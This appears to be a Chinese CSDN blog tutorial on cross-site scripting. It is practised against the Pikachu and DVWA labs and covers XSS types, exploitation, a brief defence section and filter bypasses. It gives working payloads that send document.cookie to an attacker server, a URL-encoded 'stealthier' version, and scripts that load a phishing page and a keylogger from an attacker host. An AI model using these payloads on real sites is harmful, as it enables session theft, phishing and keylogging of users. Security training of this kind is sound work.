XSS攻击

最新推荐文章于 2024-04-14 22:38:53 发布
最新推荐文章于 2024-04-14 22:38:53 发布
阅读量697 收藏 4
点赞数
分类专栏: 注入 文章标签: xss 前端 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51003021/article/details/126421385
版权

XSS攻击

1. XSS漏洞基本原理

XSS全称叫做跨站脚本攻击(cross site script)的缩写,因为缩写和CSS重复,所以叫XSS。XSS攻击时一个发生在前端的漏洞,是前端开发人员前端开发不严谨导致的漏洞。它的核心就是前端可以解析用户的输入为dom组件,所以用户可以输入一段JavaScript代码来对网站进行一些恶意修改。XSS的危害一般对一些访问量比较大的网站大,因为XSS并不会破坏网站,而是会对网站进行恶意修改,影响网站的用户,从而窃取信息甚至控制用户。

XSS漏洞一般可以分为三类:反射型,存储型和dom型。

反射型XSS:

反射型XSS交互的数据一般不会被存在在数据库里面,一次性,所见即所得,一般出现在查询类页面等。

反射型XSS的一般攻击流程为:

1.判断输入的内容会在那个位置出现

2.测试js代码会不会过滤"<script alert‘"这类字符

3.拼接测试js代码执行情况<script>alert(1)</script>
攻击url:http://192.168.0.104/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=submit

反射性XSS具体体现:

在这里插入图片描述

在这里插入图片描述

存储型XSS

存储型XSS交互的数据会被存在在数据库里面,永久性存储,一般出现在留言板,注册等页面。

存储型XSS攻击流程:

1.找到场景(留言板,注册)

2.找到输入的显示位置:判断输入值在那个标签位置

3.判断js代码过滤

4.输入js测试语句

在这里插入图片描述

DOM型XSS

DOM型XSS不与后台服务器产生数据交互,是一种通过DOM操作前端代码输出的时候产生的问题, 一次性也属于反射型。

在这里插入图片描述

2.XSS漏洞利用

反射型XSS利用

我们使用反射型XSS一般可以用来获取cookie:

构造js语句 

<script>

document.location='http://192.168.0.104:8001/pkxss/xcookie/cookie.php?cookie='+document.cookie;

</script>

在这里插入图片描述

我们可以将URL编码然后去进一步加强隐蔽性:

http://192.168.134.134:8001/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F192.168.134.134%3A8001%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E&submit=submit

下边还有POST提交方式的使用:

我们首先伪造一个HTML页面:

在这里插入图片描述

如果用户在登录状态下点击了我们的伪装页面,我们就可以获取到它的cookie,这里我们获取登录DVWA的cookie:

在这里插入图片描述

尝试登录DVWA:

在这里插入图片描述

流程:

1.找到一个存在xss漏洞的站点
2.伪造js脚本==》url
	cookie值==>发送给攻击者服务器(192.168.44.132:8080)	
	1.接收cookie信息的页面
	2.<script>
document.location = 'http://192.168.3.88/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
</script>
操作流程:
	1.搭建好攻击者服务器
	2.pkxss/xcookie/cookie.php(重定向)==》接收cookie值
	3.伪造攻击代码
	<script>
	document.location = 'http://192.168.44.132:8080/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
	</script>

3.发给用户(192.168.3.17),用户点击

其中需要注意:

get类型url位置有攻击代码可以直接发送

post类型url位置没有攻击代码不能之间发送,需要伪造一个前端文件然后让用户点击它,从而获取cookie。

存储型XSS利用

存储型XSS一般可以用来钓鱼:

在这里插入图片描述

输入

<script src="http://192.168.0.104:8001/pkxss/xfish/fish.php">
</script>

在这里插入图片描述

结果:

在这里插入图片描述

我们还可以尝试键盘记录:

输入

<script src="http://192.168.134.134:8001/pkxss/rkeypress/rk.js">
</script>

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

结果:

在这里插入图片描述

网站钓鱼一般要先伪造一个钓鱼地点,然后将我们的攻击代码注入到页面中。

3.XSS攻击整体流程

XSS测试的流程一般如下:

1.查找可能存在的注入点(搜索框,留言板,注册)

2.观察输出显示位置:
	html:
		尖括号外部,
		尖括号内部:
			引号内部==》闭合,不能闭合(能不能执行js代码)
			引号外部:能不能构造新属性

	<script>标签内部
		引号内部=》能闭合=》直接写js代码
		引号内部=》不能闭合=》观察可不可以在页面上进行输出
		直接在标签中==》直接写js代码
        
3.判断是否有过滤

4.构造payload(结合显示位置)
        
5.获取具体的信息,比如cookie,钓鱼,键盘

4.XSS攻击的防御手段

想要防御XSS攻击,我们可以对XSS攻击使用的字符串进行严格的过滤。但是过滤一般很难做到彻底,有时候还是可以使用大小写混淆或者复写拼接来绕过这些过滤的。一般我们后端使用编码来对用户的输入进行编码解码处理,使得用户的输入没有任何实质作用,不会影响到我们的页面。

5.XSS绕过防护

XSS防护机制

在现实实战中,我们的输入往往会被过滤,造成如下结果:

在这里插入图片描述

可以大致将防护机制分为下面几种类型:

1.过滤:当检测到出现攻击的关键字时,将回收关键字并且返回错误页面(固定)

2.编码:当后端检测出关键字时,将关键字进行编码处理,使得关键字失效

3.插入:当后端检测到关键字的时候,对关键字插入特定字符使其失效

4.删除:当后端发现关键字时直接将其删除

大小写绕过

当出现关键字变形处理的时候,我们可以使用大小写绕过:

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

双写绕过

当对关键字进行删除操作时,我们可以使用双写来进行绕过:

在这里插入图片描述

在这里插入图片描述

编码绕过

当后端对关键字进行编码时,我们可以通过其他方式来进行绕过:

在这里插入图片描述

在这里插入图片描述

这个就是后端疏忽没有对单引号进行实体化,导致标签可以被加属性。

YNB.小月半
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java防止xss攻击附相关文件下载
08-25
首先说一下思路,防止这种类似于注入攻击,就是使用拦截器(Filter)处理特殊字符或过滤特殊字符 今天介绍一个方法,利用覆盖Servlet的getParameter方法达到处理特殊字符的目的来解决(防止)Xss攻击 web.xml,需要的...
xss反射型post_XSS 跨站脚本攻击漏洞详解(反射型xss+储存型xss
weixin_42349126的博客
01-31 2134
XSS(Cross Site Scripting)简介:XSS 跨站脚本攻击(Cross Site Scripting),为了跟HTML里面的层叠样式表(CSS ,Cascading Style Sheets)作区分作用叫XSS.反射型XSS的入侵过程:攻击者将含有恶意JavaScript代码的URL发给用户==>用户打开URL==>web应用程序对攻击者的JavaScript做出回应...
Web渗透测试之XSS攻击:反射型XSS
vodkaDL的博客
12-20 2907
文章目录前言反射型XSS最简单的反射型XSS利用反射型XSS获得cookie获得cookie的最简单的方法DNSlog辅助获得cookie总结 前言 在上一篇博客中我们基本了解了XSS的类型和危害,在本篇中我们将通过具体的例子和讲解,深入理解反射型XSS攻击的具体过程及危害。 反射型XSS 在上一篇中我们了解到反射型XSS是立即被包含在当前响应的HTTP请求中的,并且具有一次性,接下来我们就来看看一个最简单的反射型XSS例子。 最简单的反射型XSS 靶场题目首页如下: 接着在搜索栏输入一个最简单反射型XS
xss攻击原理与解决方法
最新发布
套路猿的博客
04-14 7万+
概述XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨大的,是web安全的头号大敌。攻击的条件实施
Web 安全漏洞之 XSS 攻击
Cairo_A的博客
04-20 221
XSS(Cross-Site Scripting)又称跨站脚本,XSS的重点不在于跨站点,而是在于脚本的执行。XSS是一种经常出现在 Web 应用程序中的计算机安全漏洞,是由于 Web 应用程序对用户的输入过滤不足而产生的。常见的 XSS 攻击有三种:反射型、DOM-based 型、存储型。其中反射型、DOM-based 型可以归类为非持久型 XSS 攻击,存储型归类为持久型 XSS 攻击
漏洞:反射型 XSS 攻击
平凡的人类的博客
03-09 9008
什么是反射型 XSS 攻击? 反射型 XSS 是指应用程序通过 Web 请求获取不可信赖的数据,并在未检验数据是否存在恶意代码的情况下,将其发送给用户。反射型XSS一般可以由攻击者构造带有恶意代码参数的URL来实现,在构造的URL地址被打开后,其中包含的恶意代码参数被浏览器解析和执行。这种攻击的特点是非持久化,必须用户点击包含恶意代码参数的链接时才会触发。 实现目的: (其实说白了就类似于 SQL 注入,只不过一个是针对数据库,一个是针对 HTML ) 通过你提交的数据,实现反射型 XSS 可以..
跨站脚本攻击(XSS)详解
bluemoon_0的博客
02-04 3025
跨站脚本攻击(XSS)详解
XSS-反射型
qq_39416206的博客
03-14 1万+
xss反射型
XSS攻击原理及防范
bawei939的博客
08-29 5202
文章目录一、XSS攻击简介二、XSS攻击分类1.反射型2.存储型3.DOM-based型三、XSS防范1.cookie安全策略2.X-XSS-Protection设置3.XSS防御HTML编码4.XSS 防御HTML Attribute编码5.XSS防御之javascript编码6.XSS 防御之 URL 编码7.XSS 防御之 CSS 编码8.开启CSP网页安全政策防止XSS攻击 一、XSS攻击简介 XSS 即(Cross Site Scripting)中文名称为:跨站脚本攻击XSS的重点不在于跨站点,
常见漏洞总结(面试必问)
av11566的博客
04-27 2351
SQL注入 SQL注入就是一种通过操作输入来修改后台SQL语句达到代码执行进行攻击目的的技术。 SQL注入产生原理 对用户输入的参数没有进行严格过滤(如过滤单双引号 尖括号等),就被带到数据库执行,造成了SQL注入 使用了字符串拼接的方式构造SQL语句 文件上传 什么是文件上传漏洞? 凡是存在文件上传的地方均有可能存在文件上传漏洞,关于上传文件操作的时候对方代码写的是否完整、是否安全,一旦疏忽了某个地方可能会造成文件上传漏洞。 文件上传的原理 网站Web应用都有一些文件上传功能,比如文档
2019-3-4 dvwa学习(6)--反射型XSS攻击
weixin_42555985的博客
03-04 1915
什么是反射型XSS攻击(Reflected XSS Attacks)? 先来解释一下反射型XSS攻击的过程:攻击者把恶意代码注入到正常的URL之中,然后把带有恶意代码的URL通过邮件或者其他网站链接形式发送给用户。当用户被诱骗点击恶意链接、提交精心设计的表单,甚至浏览恶意网站时,注入的代码会传到易受攻击的网站服务器。服务器端接收数据处理后,再把带有恶意代码的数据返回用户的浏览器。由于数据来自可信网...
XSS注入——反射性XSS
wwwwyyyrre的博客
06-15 2214
所以就可以利用这个函数来构造payload,也是最简单的xss脚本语言:这样就可以绕过了 没有任何的限制 就是一个简单的反射型xss注入等明天搭一个本地的靶场来做xss-labs我认为不是很难,反射型xss
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
XSS攻击 代码演示
05-13
网站xss 攻击 代码示例,包括alert弹框,钓鱼网站截取用户cookie信息等;是学习xss的简单示例。可以下载玩玩看看,示例中的钓鱼网站地址为 演示地址,即本资源中的项目地址。xss也是很简单的,可以学习学习
防止XSS攻击解决办法
01-20
防止XSS攻击简单实用的解决办法,直接复制两个过滤器,然后配置web.xml即可实现
关于pdf文件xss攻击问题,配置xssFilter方法
12-21
所有需要的文件均在里面,超有所值
pikachu靶场--XSS--反射性/存储型/DOM型XSS【2.1】~【2.5】
lmei1228的博客
05-31 505
输入内容#'onclick="alert(111)">,构造闭合,在div里面通过我们的DOM的方法去获取到这个输入,然后再输出到div里面,但是它输入后既不会在URL里面,也不会被后台存储,因此在该场景下比较鸡肋。另一种场景就是,第一次输入后,会把输入的内容显示在URL中,然后后台把从URL中获取信息,将其赋值给a标签,点一下a标签,就会把其中的内容写到div里面,点击div对应的字段,即可执行脚本。同样也是先输入一些单引号双引号尖括号等特殊字符,submit之后,被原样输出,说明存在XSS漏洞,如。
XSS攻击详解
sysuzhyupeng的博客
03-18 5716
XSS跨站点脚本(Cross-site scripting,XSS)是一种允许攻击者在另一个用户的浏览器中执行恶意脚本的脚本注入式攻击攻击者并不直接锁定受害者。而是利用一个受害者可能会访问的存在漏洞的网站,通过这个网站间接把恶意代码呈递给受害者。对于受害者的浏览器而言,这些恶意代码看上去就是网站正常的一部分,而网站也就无意中成了攻击者的帮凶。反射型XSS发送请求时,XSS代码出现在URL中(反
web安全----XSS漏洞之基本原理
qq_41683305的博客
03-01 355
0x01 概述 XSS为跨站脚本攻击XSS攻击针对的是用户层面的攻击!类型有反射型XSS、存储型XSS、DOM型XSS,这里的DOM可以理解为页面,或者是所有的标签、内容之和 0x02 反射型XSS 反射型XSS攻击流程为: 即: 发送带有XSS恶意链接----》用户点击,访问目标服务器-----》目标服务器将XSS同正常页面返回给用户-----》用户浏览器解析恶意XSS,向恶意服务器请求-----》恶意服务器获取用户信息。 所以反射型XSS又称为非持久型XSS,经过后端,不经过数据库,需要诱导目标去访
XSS漏洞检测流程图
09-22
XSS漏洞检测流程图如下: 1. 收集用户输入和敏感数据源:包括用户提交的表单数据、URL参数、Cookie等。 2. 进行输入过滤和验证:对用户输入进行过滤,防止恶意代码注入,可以使用安全的编码方式对输入进行转义处理。 3. 输出过滤和转义:对所有输出到网页的数据进行过滤和转义处理,确保不执行任何恶意代码。 4. 使用安全的编码方式:对特殊字符进行转义,确保代码被当作数据处理而不是执行。 5. 使用HTTP-only标志设置Cookie:将Cookie标记为HTTP-only,防止通过JavaScript访问Cookie。 6. 使用Content Security Policy (CSP):设置CSP策略,限制页面的资源加载,防止恶意脚本的执行。 7. 运行安全扫描工具:使用自动化工具进行漏洞扫描,检测是否存在XSS漏洞。 8. 手动测试和审查:通过手动测试和审查网页源代码,检查是否存在XSS漏洞。 9. 反复测试和修复:持续进行测试和修复,确保网页的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值